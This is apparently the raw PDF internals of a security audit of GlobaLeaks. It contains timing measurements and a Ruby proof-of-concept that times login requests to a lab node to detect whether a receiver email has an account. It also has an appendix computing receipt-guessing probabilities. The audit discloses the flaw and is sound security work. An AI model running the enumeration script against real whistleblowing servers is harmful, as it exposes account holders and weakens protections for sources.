Invalid Email \(bavoc@defuse.ca\)) Tj T* (-----------------------------------------------------------------) Tj T* (Control Average: 0.004657399299999999) Tj T* (Target Average: 0.13163266159999998) Tj T* (Difference: 0.12697526229999997) Tj T* T* (Control Average: 0.0050664069) Tj T* (Target Average: 0.1289540489) Tj T* (Difference: 0.123887642) Tj T* T* (Control Average: 0.004537787600000001) Tj T* (Target Average: 0.138862824) Tj T* (Difference: 0.1343250364) Tj T* T* (Invalid Email \(zavoc@defuse.ca\) vs. Invalid Email \(bavoc@defuse.ca\)) Tj T* (-------------------------------------------------------------------) Tj T* T* (Control Average: 0.0040217026) Tj T* (Target Average: 0.004116626700000001) Tj T* (Difference: 9.492410000000104e-05) Tj T* T* (Control Average: 0.0046012976) Tj T* (Target Average: 0.004645221) Tj T* (Difference: 4.392339999999967e-05) Tj T* T* (Control Average: 0.005551629099999999) Tj T* (Target Average: 0.0057293925) Tj T* (Difference: 0.00017776340000000106) Tj T* ET Q Q Q Q Q q 1 0 0 1 62.69291 162.8236 cm Q endstream endobj % 'R390': class PDFStream 390 0 obj % page stream << /Length 8858 >> stream 1 0 0 1 0 0 cm BT /F1 12 Tf 14.4 TL ET q 1 0 0 1 62.69291 243.0291 cm q q .789465 0 0 .789465 0 0 cm q 1 0 0 1 6.6 8.360088 cm q .662745 .662745 .662745 RG .5 w .960784 .960784 .862745 rg n -6 -6 594 660 re B* Q q BT 1 0 0 1 0 638 Tm 12 TL /F3 10 Tf 0 .501961 0 rg (require) Tj 0 0 0 rg ( ) Tj .729412 .129412 .129412 rg ('net/http') Tj 0 0 0 rg T* T* /F7 10 Tf .25098 .501961 .501961 rg (# NOTE: for this proof of concept to work, the exponential login delay must be) Tj /F3 10 Tf 0 0 0 rg T* /F7 10 Tf .25098 .501961 .501961 rg (# disabled. This was done by setting timeout=0 in security_sleep\(\).) Tj /F3 10 Tf 0 0 0 rg T* T* /F7 10 Tf .25098 .501961 .501961 rg (# The email address you think has a receiver account.) 
Tj /F3 10 Tf 0 0 0 rg T* .533333 0 0 rg (TARGET_EMAIL) Tj 0 0 0 rg ( ) Tj .4 .4 .4 rg (=) Tj 0 0 0 rg ( ) Tj .729412 .129412 .129412 rg ('havoc@defuse.ca') Tj 0 0 0 rg T* /F7 10 Tf .25098 .501961 .501961 rg (# Another email address of the same length that does not have an account.) Tj /F3 10 Tf 0 0 0 rg T* .533333 0 0 rg (CONTROL_EMAIL) Tj 0 0 0 rg ( ) Tj .4 .4 .4 rg (=) Tj 0 0 0 rg ( ) Tj .729412 .129412 .129412 rg ('bavoc@defuse.ca') Tj 0 0 0 rg T* T* /F7 10 Tf .25098 .501961 .501961 rg (# URL \(including port\) of the GlobaLeaks Node) Tj /F3 10 Tf 0 0 0 rg T* .533333 0 0 rg (TARGET_ADDRESS) Tj 0 0 0 rg ( ) Tj .4 .4 .4 rg (=) Tj 0 0 0 rg ( ) Tj .729412 .129412 .129412 rg ('http://192.168.1.248:8082') Tj 0 0 0 rg T* /F7 10 Tf .25098 .501961 .501961 rg (# XSRF Token \(get this by sniffing your own HTTP headers\)) Tj /F3 10 Tf 0 0 0 rg T* .533333 0 0 rg (XSRF_TOKEN) Tj 0 0 0 rg ( ) Tj .4 .4 .4 rg (=) Tj 0 0 0 rg ( ) Tj .729412 .129412 .129412 rg ('11709ac885254109a664ef602faf5153') Tj 0 0 0 rg T* T* /F7 10 Tf .25098 .501961 .501961 rg (# We take 100 samples, then only keep the shortest 10.) Tj /F3 10 Tf 0 0 0 rg T* .533333 0 0 rg (SAMPLE_SIZE) Tj 0 0 0 rg ( ) Tj .4 .4 .4 rg (=) Tj 0 0 0 rg ( ) Tj .4 .4 .4 rg (100) Tj 0 0 0 rg T* .533333 0 0 rg (SUBSAMBLE_SIZE) Tj 0 0 0 rg ( ) Tj .4 .4 .4 rg (=) Tj 0 0 0 rg ( ) Tj .4 .4 .4 rg (10) Tj 0 0 0 rg T* T* /F7 10 Tf .25098 .501961 .501961 rg (# Tries to log in and measures the response time.) Tj /F3 10 Tf 0 0 0 rg T* /F6 10 Tf 0 .501961 0 rg (def) Tj /F3 10 Tf 0 0 0 rg ( ) Tj 0 0 1 rg (measure_login_time) Tj 0 0 0 rg (\() Tj (email) Tj (,) Tj ( ) Tj (password) Tj (\)) Tj T* ( ) Tj (uri) Tj ( ) Tj .4 .4 .4 rg (=) Tj 0 0 0 rg ( ) Tj .533333 0 0 rg (URI) Tj .4 .4 .4 rg (.) Tj 0 0 0 rg (parse) Tj (\() Tj .533333 0 0 rg (TARGET_ADDRESS) Tj 0 0 0 rg (\)) Tj T* ( ) Tj (http) Tj ( ) Tj .4 .4 .4 rg (=) Tj 0 0 0 rg ( ) Tj .098039 .090196 .486275 rg (Net) Tj 0 0 0 rg (:) Tj .098039 .090196 .486275 rg (:HTTP) Tj .4 .4 .4 rg (.) 
Tj 0 0 0 rg (new) Tj (\() Tj (uri) Tj .4 .4 .4 rg (.) Tj 0 0 0 rg (host) Tj (,) Tj ( ) Tj (uri) Tj .4 .4 .4 rg (.) Tj 0 0 0 rg (port) Tj (\)) Tj T* ( ) Tj (request) Tj ( ) Tj .4 .4 .4 rg (=) Tj 0 0 0 rg ( ) Tj .098039 .090196 .486275 rg (Net) Tj 0 0 0 rg (:) Tj .098039 .090196 .486275 rg (:HTTP) Tj .4 .4 .4 rg (::) Tj .533333 0 0 rg (Post) Tj .4 .4 .4 rg (.) Tj 0 0 0 rg (new) Tj (\() Tj .729412 .129412 .129412 rg ('/authentication') Tj 0 0 0 rg (\)) Tj T* ( ) Tj (request) Tj .4 .4 .4 rg (.) Tj 0 0 0 rg (add_field) Tj (\() Tj .729412 .129412 .129412 rg ('Content-Type') Tj 0 0 0 rg (,) Tj ( ) Tj .729412 .129412 .129412 rg ('application/json;charset=utf-8') Tj 0 0 0 rg (\)) Tj T* ( ) Tj (request) Tj .4 .4 .4 rg (.) Tj 0 0 0 rg (add_field) Tj (\() Tj .729412 .129412 .129412 rg ('X-XSRF-TOKEN') Tj 0 0 0 rg (,) Tj ( ) Tj .533333 0 0 rg (XSRF_TOKEN) Tj 0 0 0 rg (\)) Tj T* ( ) Tj (request) Tj .4 .4 .4 rg (.) Tj 0 0 0 rg (add_field) Tj (\() Tj .729412 .129412 .129412 rg ('Cookie') Tj 0 0 0 rg (,) Tj ( ) Tj .729412 .129412 .129412 rg ('XSRF-TOKEN=') Tj 0 0 0 rg ( ) Tj .4 .4 .4 rg (+) Tj 0 0 0 rg ( ) Tj .533333 0 0 rg (XSRF_TOKEN) Tj 0 0 0 rg (\)) Tj T* ( ) Tj (request) Tj .4 .4 .4 rg (.) 
Tj 0 0 0 rg (body) Tj ( ) Tj .4 .4 .4 rg (=) Tj 0 0 0 rg ( ) Tj .729412 .129412 .129412 rg ("{) Tj /F6 10 Tf .733333 .4 .133333 rg (\\") Tj /F3 10 Tf .729412 .129412 .129412 rg (username) Tj /F6 10 Tf .733333 .4 .133333 rg (\\") Tj /F3 10 Tf .729412 .129412 .129412 rg (:) Tj /F6 10 Tf .733333 .4 .133333 rg (\\") Tj .733333 .4 .533333 rg (#{) Tj /F3 10 Tf 0 0 0 rg (email) Tj /F6 10 Tf .733333 .4 .533333 rg (}) Tj .733333 .4 .133333 rg (\\") Tj /F3 10 Tf .729412 .129412 .129412 rg (,) Tj /F6 10 Tf .733333 .4 .133333 rg (\\") Tj /F3 10 Tf .729412 .129412 .129412 rg (password) Tj /F6 10 Tf .733333 .4 .133333 rg (\\") Tj /F3 10 Tf .729412 .129412 .129412 rg (:) Tj /F6 10 Tf .733333 .4 .133333 rg (\\") Tj .733333 .4 .533333 rg (#{) Tj /F3 10 Tf 0 0 0 rg (password) Tj /F6 10 Tf .733333 .4 .533333 rg (}) Tj .733333 .4 .133333 rg (\\") Tj /F3 10 Tf .729412 .129412 .129412 rg (,) Tj /F6 10 Tf .733333 .4 .133333 rg (\\") Tj /F3 10 Tf .729412 .129412 .129412 rg (role) Tj /F6 10 Tf .733333 .4 .133333 rg (\\") Tj /F3 10 Tf .729412 .129412 .129412 rg (:) Tj /F6 10 Tf .733333 .4 .133333 rg (\\") Tj /F3 10 Tf .729412 .129412 .129412 rg (receiver) Tj /F6 10 Tf .733333 .4 .133333 rg (\\") Tj /F3 10 Tf .729412 .129412 .129412 rg (}") Tj 0 0 0 rg T* ( ) Tj (start_time) Tj ( ) Tj .4 .4 .4 rg (=) Tj 0 0 0 rg ( ) Tj .533333 0 0 rg (Time) Tj .4 .4 .4 rg (.) Tj 0 0 0 rg (now) Tj T* ( ) Tj (response) Tj ( ) Tj .4 .4 .4 rg (=) Tj 0 0 0 rg ( ) Tj (http) Tj .4 .4 .4 rg (.) Tj 0 0 0 rg (request) Tj (\() Tj (request) Tj (\)) Tj T* ( ) Tj (end_time) Tj ( ) Tj .4 .4 .4 rg (=) Tj 0 0 0 rg ( ) Tj .533333 0 0 rg (Time) Tj .4 .4 .4 rg (.) 
Tj 0 0 0 rg (now) Tj T* ( ) Tj /F6 10 Tf 0 .501961 0 rg (return) Tj /F3 10 Tf 0 0 0 rg ( ) Tj (end_time) Tj ( ) Tj .4 .4 .4 rg (-) Tj 0 0 0 rg ( ) Tj (start_time) Tj T* /F6 10 Tf 0 .501961 0 rg (end) Tj /F3 10 Tf 0 0 0 rg T* T* (control) Tj ( ) Tj .4 .4 .4 rg (=) Tj 0 0 0 rg ( ) Tj .4 .4 .4 rg ([]) Tj 0 0 0 rg T* (target) Tj ( ) Tj .4 .4 .4 rg (=) Tj 0 0 0 rg ( ) Tj .4 .4 .4 rg ([]) Tj 0 0 0 rg T* T* .533333 0 0 rg (SAMPLE_SIZE) Tj .4 .4 .4 rg (.) Tj 0 0 0 rg (times) Tj ( ) Tj /F6 10 Tf 0 .501961 0 rg (do) Tj /F3 10 Tf 0 0 0 rg ( ) Tj .4 .4 .4 rg (|) Tj 0 0 0 rg (i) Tj .4 .4 .4 rg (|) Tj 0 0 0 rg T* ( ) Tj (target) Tj ( ) Tj .4 .4 .4 rg (<) Tj (<) Tj 0 0 0 rg ( ) Tj (measure_login_time) Tj (\() Tj .533333 0 0 rg (TARGET_EMAIL) Tj 0 0 0 rg (,) Tj ( ) Tj .729412 .129412 .129412 rg ('a') Tj 0 0 0 rg (\)) Tj T* ( ) Tj (control) Tj ( ) Tj .4 .4 .4 rg (<) Tj (<) Tj 0 0 0 rg ( ) Tj (measure_login_time) Tj (\() Tj .533333 0 0 rg (CONTROL_EMAIL) Tj 0 0 0 rg (,) Tj ( ) Tj .729412 .129412 .129412 rg ('a') Tj 0 0 0 rg (\)) Tj T* ( ) Tj 0 .501961 0 rg (print) Tj 0 0 0 rg ( ) Tj .729412 .129412 .129412 rg (".") Tj 0 0 0 rg T* /F6 10 Tf 0 .501961 0 rg (end) Tj /F3 10 Tf 0 0 0 rg T* 0 .501961 0 rg (puts) Tj 0 0 0 rg ( ) Tj .729412 .129412 .129412 rg ("") Tj 0 0 0 rg T* T* /F7 10 Tf .25098 .501961 .501961 rg (# Keep only the shortest measurements. These will be the ones with the least) Tj /F3 10 Tf 0 0 0 rg T* /F7 10 Tf .25098 .501961 .501961 rg (# amount of noise.) Tj /F3 10 Tf 0 0 0 rg T* (control) Tj .4 .4 .4 rg (.) Tj 0 0 0 rg (sort!) Tj T* (control_avg) Tj ( ) Tj .4 .4 .4 rg (=) Tj 0 0 0 rg ( ) Tj (control) Tj .4 .4 .4 rg (.) Tj 0 0 0 rg (first) Tj (\() Tj .533333 0 0 rg (SUBSAMBLE_SIZE) Tj 0 0 0 rg (\)) Tj .4 .4 .4 rg (.) Tj 0 0 0 rg (reduce) Tj (\() Tj .098039 .090196 .486275 rg (:+) Tj 0 0 0 rg (\)) Tj .4 .4 .4 rg (/) Tj .533333 0 0 rg (SUBSAMBLE_SIZE) Tj .4 .4 .4 rg (.) Tj 0 0 0 rg (to_f) Tj T* (target) Tj .4 .4 .4 rg (.) Tj 0 0 0 rg (sort!) 
Tj T* (target_avg) Tj ( ) Tj .4 .4 .4 rg (=) Tj 0 0 0 rg ( ) Tj (target) Tj .4 .4 .4 rg (.) Tj 0 0 0 rg (first) Tj (\() Tj .533333 0 0 rg (SUBSAMBLE_SIZE) Tj 0 0 0 rg (\)) Tj .4 .4 .4 rg (.) Tj 0 0 0 rg (reduce) Tj (\() Tj .098039 .090196 .486275 rg (:+) Tj 0 0 0 rg (\)) Tj .4 .4 .4 rg (/) Tj .533333 0 0 rg (SUBSAMBLE_SIZE) Tj .4 .4 .4 rg (.) Tj 0 0 0 rg (to_f) Tj T* T* 0 .501961 0 rg (puts) Tj 0 0 0 rg ( ) Tj .729412 .129412 .129412 rg ("Control Average: ) Tj /F6 10 Tf .733333 .4 .533333 rg (#{) Tj /F3 10 Tf 0 0 0 rg (control_avg) Tj /F6 10 Tf .733333 .4 .533333 rg (}) Tj /F3 10 Tf .729412 .129412 .129412 rg (") Tj 0 0 0 rg T* 0 .501961 0 rg (puts) Tj 0 0 0 rg ( ) Tj .729412 .129412 .129412 rg ("Target Average: ) Tj /F6 10 Tf .733333 .4 .533333 rg (#{) Tj /F3 10 Tf 0 0 0 rg (target_avg) Tj /F6 10 Tf .733333 .4 .533333 rg (}) Tj /F3 10 Tf .729412 .129412 .129412 rg (") Tj 0 0 0 rg T* 0 .501961 0 rg (puts) Tj 0 0 0 rg ( ) Tj .729412 .129412 .129412 rg ("Difference: ) Tj /F6 10 Tf .733333 .4 .533333 rg (#{) Tj /F3 10 Tf 0 0 0 rg (target_avg) Tj ( ) Tj .4 .4 .4 rg (-) Tj 0 0 0 rg ( ) Tj (control_avg) Tj /F6 10 Tf .733333 .4 .533333 rg (}) Tj /F3 10 Tf .729412 .129412 .129412 rg (") Tj T* ET Q Q Q Q Q q 1 0 0 1 62.69291 235.0291 cm Q endstream endobj % 'R391': class PDFStream 391 0 obj % page stream << /Length 5097 >> stream 1 0 0 1 0 0 cm BT /F1 12 Tf 14.4 TL ET q 1 0 0 1 62.69291 723.0236 cm q BT 1 0 0 1 0 24.5 Tm 21 TL /F2 17.5 Tf 0 0 0 rg (Appendix E. 
Computing Multiple Target Guessing) Tj T* (Success Probabilities) Tj T* ET Q Q q 1 0 0 1 62.69291 657.0236 cm q BT 1 0 0 1 0 50 Tm .206488 Tw 12 TL /F1 10 Tf 0 0 0 rg (The Ruby script below takes a ) Tj /F4 10 Tf (K) Tj /F1 10 Tf (, ) Tj /F4 10 Tf (N) Tj /F1 10 Tf (, and ) Tj /F4 10 Tf (G ) Tj /F1 10 Tf (where ) Tj /F4 10 Tf (K ) Tj /F1 10 Tf (is the keyspace size \(corresponding to the number of) Tj T* 0 Tw .291654 Tw (possible receipts\), ) Tj /F4 10 Tf (N ) Tj /F1 10 Tf (is the number of targets \(corresponding to the number of existing Tips\), and ) Tj /F4 10 Tf (G ) Tj /F1 10 Tf (is the) Tj T* 0 Tw .362485 Tw (number of guesses the attacker makes. From these values, it computes the probability that the attack will) Tj T* 0 Tw .364198 Tw (succeed. The exact probability is computed by ) Tj /F4 10 Tf (1 - \(K-N choose G\) / \(K choose G\) ) Tj /F1 10 Tf (using an algorithm that) Tj T* 0 Tw (is efficient for small ) Tj /F4 10 Tf (N) Tj /F1 10 Tf (.) Tj T* ET Q Q q 1 0 0 1 62.69291 419.8236 cm q q 1 0 0 1 0 0 cm q 1 0 0 1 6.6 6.6 cm q .662745 .662745 .662745 RG .5 w .960784 .960784 .862745 rg n -6 -6 468.6898 228 re B* Q q BT 1 0 0 1 0 206 Tm 12 TL /F7 10 Tf .25098 .501961 .501961 rg (# Computes \(K-N choose G\) / \(K choose G\) in O\(N\)-ish time.) Tj /F3 10 Tf 0 0 0 rg T* (k) Tj ( ) Tj .4 .4 .4 rg (=) Tj 0 0 0 rg ( ) Tj .4 .4 .4 rg (10) Tj (**) Tj (10) Tj 0 0 0 rg T* (n) Tj ( ) Tj .4 .4 .4 rg (=) Tj 0 0 0 rg ( ) Tj .4 .4 .4 rg (1000) Tj 0 0 0 rg T* (g) Tj ( ) Tj .4 .4 .4 rg (=) Tj 0 0 0 rg ( ) Tj (\() Tj .4 .4 .4 rg (1) Tj (.) Tj (4) Tj (*) Tj (3600) Tj (*) Tj (1000) Tj 0 0 0 rg (\)) Tj .4 .4 .4 rg (.) Tj 0 0 0 rg (floor) Tj T* T* (div) Tj ( ) Tj .4 .4 .4 rg (=) Tj 0 0 0 rg ( ) Tj .4 .4 .4 rg (1) Tj 0 0 0 rg T* (mul) Tj ( ) Tj .4 .4 .4 rg (=) Tj 0 0 0 rg ( ) Tj .4 .4 .4 rg (1) Tj 0 0 0 rg T* T* (n) Tj .4 .4 .4 rg (.) 
Tj 0 0 0 rg (times) Tj ( ) Tj /F6 10 Tf 0 .501961 0 rg (do) Tj /F3 10 Tf 0 0 0 rg ( ) Tj .4 .4 .4 rg (|) Tj 0 0 0 rg (i) Tj .4 .4 .4 rg (|) Tj 0 0 0 rg T* ( ) Tj (div) Tj ( ) Tj .4 .4 .4 rg (*=) Tj 0 0 0 rg ( ) Tj (\() Tj (k) Tj ( ) Tj .4 .4 .4 rg (-) Tj 0 0 0 rg ( ) Tj (i) Tj (\)) Tj T* ( ) Tj (mul) Tj ( ) Tj .4 .4 .4 rg (*=) Tj 0 0 0 rg ( ) Tj (\() Tj (k) Tj ( ) Tj .4 .4 .4 rg (-) Tj 0 0 0 rg ( ) Tj (g) Tj ( ) Tj .4 .4 .4 rg (-) Tj 0 0 0 rg ( ) Tj (i) Tj (\)) Tj T* /F6 10 Tf 0 .501961 0 rg (end) Tj /F3 10 Tf 0 0 0 rg T* T* 0 .501961 0 rg (puts) Tj 0 0 0 rg ( ) Tj .729412 .129412 .129412 rg ("Exact:") Tj 0 0 0 rg T* 0 .501961 0 rg (puts) Tj 0 0 0 rg ( ) Tj .4 .4 .4 rg (1) Tj 0 0 0 rg ( ) Tj .4 .4 .4 rg (-) Tj 0 0 0 rg ( ) Tj (\(\() Tj (mul) Tj ( ) Tj .4 .4 .4 rg (*) Tj 0 0 0 rg ( ) Tj .4 .4 .4 rg (1_000_000_000) Tj 0 0 0 rg (\)) Tj ( ) Tj .4 .4 .4 rg (/) Tj 0 0 0 rg ( ) Tj (div) Tj (\)) Tj .4 .4 .4 rg (.) Tj 0 0 0 rg (to_f) Tj ( ) Tj .4 .4 .4 rg (/) Tj 0 0 0 rg ( ) Tj .4 .4 .4 rg (1_000_000_000) Tj (.) Tj (0) Tj 0 0 0 rg T* T* 0 .501961 0 rg (puts) Tj 0 0 0 rg ( ) Tj .729412 .129412 .129412 rg ("1 - \(1-G/K\)^N estimate:") Tj 0 0 0 rg T* 0 .501961 0 rg (puts) Tj 0 0 0 rg ( ) Tj .4 .4 .4 rg (1) Tj 0 0 0 rg ( ) Tj .4 .4 .4 rg (-) Tj 0 0 0 rg ( ) Tj (\() Tj .4 .4 .4 rg (1) Tj (-) Tj 0 0 0 rg (g) Tj .4 .4 .4 rg (.) Tj 0 0 0 rg (to_f) Tj .4 .4 .4 rg (/) Tj 0 0 0 rg (k) Tj .4 .4 .4 rg (.) Tj 0 0 0 rg (to_f) Tj (\)) Tj .4 .4 .4 rg (**) Tj 0 0 0 rg (n) Tj T* ET Q Q Q Q Q q 1 0 0 1 62.69291 399.8236 cm q BT 1 0 0 1 0 2 Tm 12 TL /F1 10 Tf 0 0 0 rg (To find the number of guesses to expect for a given ) Tj /F4 10 Tf (K ) Tj /F1 10 Tf (and ) Tj /F4 10 Tf (N) Tj /F1 10 Tf (, increase ) Tj /F4 10 Tf (G ) Tj /F1 10 Tf (until the result is near 0.5.) Tj T* ET Q Q q 1 0 0 1 62.69291 297.8236 cm q BT 1 0 0 1 0 86 Tm 1.124987 Tw 12 TL /F1 10 Tf 0 0 0 rg (The formula can be explained as follows. We first compute the probability that the attack will fail. 
If the) Tj T* 0 Tw .987485 Tw /F4 10 Tf (GlobaLeaks ) Tj /F1 10 Tf (Node chooses ) Tj /F4 10 Tf (N ) Tj /F1 10 Tf (receipts, then the attack will fail only if the attacker guesses only receipts) Tj T* 0 Tw 1.22683 Tw (that were not chosen by ) Tj /F4 10 Tf (GlobaLeaks) Tj /F1 10 Tf (. In other words, in order for the attack to fail, all of the attacker's) Tj T* 0 Tw .817488 Tw (guesses must be in the ) Tj /F4 10 Tf (K-N ) Tj /F1 10 Tf (receipts that are not in use. There are \(K choose G\) ways the attacker can) Tj T* 0 Tw .362485 Tw (choose their guesses, and \(K-N choose G\) ways to choose the guesses from the leftover ) Tj /F4 10 Tf (K-N) Tj /F1 10 Tf (. Therefore,) Tj T* 0 Tw .276905 Tw (assuming the attacker chooses their guesses randomly without replacement \(which is their best strategy\),) Tj T* 0 Tw 2.382093 Tw (then the probability that the attack will fail is \(K-N choose G\) divided by \(K choose G\). To get the) Tj T* 0 Tw (probability that the attack will succeed, we subtract that value from one.) 
Tj T* ET Q Q q 1 0 0 1 62.69291 297.8236 cm Q endstream endobj % 'R392': class PDFPageLabels 392 0 obj % Document Root << /Nums [ 0 393 0 R 1 394 0 R 2 395 0 R 3 396 0 R 4 397 0 R 5 398 0 R 6 399 0 R 7 400 0 R 8 401 0 R 9 402 0 R 10 403 0 R 11 404 0 R 12 405 0 R 13 406 0 R 14 407 0 R 15 408 0 R 16 409 0 R 17 410 0 R 18 411 0 R 19 412 0 R 20 413 0 R 21 414 0 R 22 415 0 R 23 416 0 R 24 417 0 R 25 418 0 R 26 419 0 R 27 420 0 R 28 421 0 R 29 422 0 R 30 423 0 R 31 424 0 R 32 425 0 R 33 426 0 R 34 427 0 R 35 428 0 R 36 429 0 R 37 430 0 R 38 431 0 R 39 432 0 R 40 433 0 R 41 434 0 R 42 435 0 R 43 436 0 R 44 437 0 R 45 438 0 R 46 439 0 R 47 440 0 R 48 441 0 R ] >> endobj % 'R393': class PDFPageLabel 393 0 obj % None << /S /D /St 1 >> endobj % 'R394': class PDFPageLabel 394 0 obj % None << /S /D /St 2 >> endobj % 'R395': class PDFPageLabel 395 0 obj % None << /S /D /St 3 >> endobj % 'R396': class PDFPageLabel 396 0 obj % None << /S /D /St 4 >> endobj % 'R397': class PDFPageLabel 397 0 obj % None << /S /D /St 5 >> endobj % 'R398': class PDFPageLabel 398 0 obj % None << /S /D /St 6 >> endobj % 'R399': class PDFPageLabel 399 0 obj % None << /S /D /St 7 >> endobj % 'R400': class PDFPageLabel 400 0 obj % None << /S /D /St 8 >> endobj % 'R401': class PDFPageLabel 401 0 obj % None << /S /D /St 9 >> endobj % 'R402': class PDFPageLabel 402 0 obj % None << /S /D /St 10 >> endobj % 'R403': class PDFPageLabel 403 0 obj % None << /S /D /St 11 >> endobj % 'R404': class PDFPageLabel 404 0 obj % None << /S /D /St 12 >> endobj % 'R405': class PDFPageLabel 405 0 obj % None << /S /D /St 13 >> endobj % 'R406': class PDFPageLabel 406 0 obj % None << /S /D /St 14 >> endobj % 'R407': class PDFPageLabel 407 0 obj % None << /S /D /St 15 >> endobj % 'R408': class PDFPageLabel 408 0 obj % None << /S /D /St 16 >> endobj % 'R409': class PDFPageLabel 409 0 obj % None << /S /D /St 17 >> endobj % 'R410': class PDFPageLabel 410 0 obj % None << /S /D /St 18 >> endobj % 'R411': class PDFPageLabel 411 0 obj % 
None << /S /D /St 19 >> endobj % 'R412': class PDFPageLabel 412 0 obj % None << /S /D /St 20 >> endobj % 'R413': class PDFPageLabel 413 0 obj % None << /S /D /St 21 >> endobj % 'R414': class PDFPageLabel 414 0 obj % None << /S /D /St 22 >> endobj % 'R415': class PDFPageLabel 415 0 obj % None << /S /D /St 23 >> endobj % 'R416': class PDFPageLabel 416 0 obj % None << /S /D /St 24 >> endobj % 'R417': class PDFPageLabel 417 0 obj % None << /S /D /St 25 >> endobj % 'R418': class PDFPageLabel 418 0 obj % None << /S /D /St 26 >> endobj % 'R419': class PDFPageLabel 419 0 obj % None << /S /D /St 27 >> endobj % 'R420': class PDFPageLabel 420 0 obj % None << /S /D /St 28 >> endobj % 'R421': class PDFPageLabel 421 0 obj % None << /S /D /St 29 >> endobj % 'R422': class PDFPageLabel 422 0 obj % None << /S /D /St 30 >> endobj % 'R423': class PDFPageLabel 423 0 obj % None << /S /D /St 31 >> endobj % 'R424': class PDFPageLabel 424 0 obj % None << /S /D /St 32 >> endobj % 'R425': class PDFPageLabel 425 0 obj % None << /S /D /St 33 >> endobj % 'R426': class PDFPageLabel 426 0 obj % None << /S /D /St 34 >> endobj % 'R427': class PDFPageLabel 427 0 obj % None << /S /D /St 35 >> endobj % 'R428': class PDFPageLabel 428 0 obj % None << /S /D /St 36 >> endobj % 'R429': class PDFPageLabel 429 0 obj % None << /S /D /St 37 >> endobj % 'R430': class PDFPageLabel 430 0 obj % None << /S /D /St 38 >> endobj % 'R431': class PDFPageLabel 431 0 obj % None << /S /D /St 39 >> endobj % 'R432': class PDFPageLabel 432 0 obj % None << /S /D /St 40 >> endobj % 'R433': class PDFPageLabel 433 0 obj % None << /S /D /St 41 >> endobj % 'R434': class PDFPageLabel 434 0 obj % None << /S /D /St 42 >> endobj % 'R435': class PDFPageLabel 435 0 obj % None << /S /D /St 43 >> endobj % 'R436': class PDFPageLabel 436 0 obj % None << /S /D /St 44 >> endobj % 'R437': class PDFPageLabel 437 0 obj % None << /S /D /St 45 >> endobj % 'R438': class PDFPageLabel 438 0 obj % None << /S /D /St 46 >> endobj % 'R439': class 
PDFPageLabel 439 0 obj % None << /S /D /St 47 >> endobj % 'R440': class PDFPageLabel 440 0 obj % None << /S /D /St 48 >> endobj % 'R441': class PDFPageLabel 441 0 obj % None << /S /D /St 49 >> endobj xref 0 442 0000000000 65535 f 0000000113 00000 n 0000000304 00000 n 0000000469 00000 n 0000000656 00000 n 0000000906 00000 n 0000001155 00000 n 0000001405 00000 n 0000001656 00000 n 0000001898 00000 n 0000002140 00000 n 0000002383 00000 n 0000002626 00000 n 0000002870 00000 n 0000003114 00000 n 0000003358 00000 n 0000003602 00000 n 0000003846 00000 n 0000004090 00000 n 0000004334 00000 n 0000004578 00000 n 0000004822 00000 n 0000005066 00000 n 0000005310 00000 n 0000005554 00000 n 0000005798 00000 n 0000006042 00000 n 0000006286 00000 n 0000006530 00000 n 0000006774 00000 n 0000007018 00000 n 0000007262 00000 n 0000007506 00000 n 0000007750 00000 n 0000007994 00000 n 0000008238 00000 n 0000008482 00000 n 0000008726 00000 n 0000008970 00000 n 0000009214 00000 n 0000009458 00000 n 0000009702 00000 n 0000009946 00000 n 0000010190 00000 n 0000010434 00000 n 0000010678 00000 n 0000010922 00000 n 0000011166 00000 n 0000011396 00000 n 0000011572 00000 n 0000011816 00000 n 0000012060 00000 n 0000012304 00000 n 0000012548 00000 n 0000012792 00000 n 0000013036 00000 n 0000013280 00000 n 0000013524 00000 n 0000013768 00000 n 0000014012 00000 n 0000014256 00000 n 0000014500 00000 n 0000014744 00000 n 0000014988 00000 n 0000015232 00000 n 0000015476 00000 n 0000015720 00000 n 0000015964 00000 n 0000016192 00000 n 0000017063 00000 n 0000017307 00000 n 0000017551 00000 n 0000017795 00000 n 0000018039 00000 n 0000018283 00000 n 0000018527 00000 n 0000018771 00000 n 0000019015 00000 n 0000019259 00000 n 0000019503 00000 n 0000019747 00000 n 0000019991 00000 n 0000020235 00000 n 0000020479 00000 n 0000020723 00000 n 0000020967 00000 n 0000021211 00000 n 0000021455 00000 n 0000021699 00000 n 0000021943 00000 n 0000022187 00000 n 0000022431 00000 n 0000022675 00000 n 0000022919 00000 n 
0000023163 00000 n 0000023407 00000 n 0000023651 00000 n 0000023895 00000 n 0000024139 00000 n 0000024383 00000 n 0000024627 00000 n 0000024872 00000 n 0000025117 00000 n 0000025362 00000 n 0000025607 00000 n 0000025853 00000 n 0000026099 00000 n 0000026345 00000 n 0000026591 00000 n 0000026837 00000 n 0000027083 00000 n 0000027329 00000 n 0000027575 00000 n 0000027821 00000 n 0000028067 00000 n 0000028313 00000 n 0000028559 00000 n 0000028805 00000 n 0000029051 00000 n 0000029297 00000 n 0000029543 00000 n 0000029789 00000 n 0000030035 00000 n 0000030281 00000 n 0000030527 00000 n 0000030773 00000 n 0000031019 00000 n 0000031265 00000 n 0000031511 00000 n 0000031757 00000 n 0000032003 00000 n 0000032249 00000 n 0000032495 00000 n 0000032724 00000 n 0000033644 00000 n 0000033905 00000 n 0000034164 00000 n 0000034430 00000 n 0000034757 00000 n 0000034955 00000 n 0000035201 00000 n 0000035430 00000 n 0000035745 00000 n 0000036044 00000 n 0000036288 00000 n 0000036519 00000 n 0000036724 00000 n 0000037006 00000 n 0000037271 00000 n 0000037606 00000 n 0000037889 00000 n 0000038215 00000 n 0000229954 00000 n 0000230352 00000 n 0000230718 00000 n 0000230976 00000 n 0000231324 00000 n 0000305766 00000 n 0000306231 00000 n 0000306624 00000 n 0000361500 00000 n 0000361906 00000 n 0000362232 00000 n 0000362505 00000 n 0000362778 00000 n 0000363096 00000 n 0000363369 00000 n 0000363687 00000 n 0000363945 00000 n 0000364394 00000 n 0000364624 00000 n 0000364945 00000 n 0000365218 00000 n 0000365476 00000 n 0000365807 00000 n 0000366080 00000 n 0000366338 00000 n 0000366669 00000 n 0000366942 00000 n 0000367260 00000 n 0000367578 00000 n 0000367836 00000 n 0000368188 00000 n 0000368433 00000 n 0000368679 00000 n 0000368925 00000 n 0000369156 00000 n 0000369329 00000 n 0000369507 00000 n 0000369859 00000 n 0000370105 00000 n 0000370351 00000 n 0000370596 00000 n 0000370854 00000 n 0000371191 00000 n 0000371377 00000 n 0000371676 00000 n 0000371932 00000 n 0000372188 00000 n 
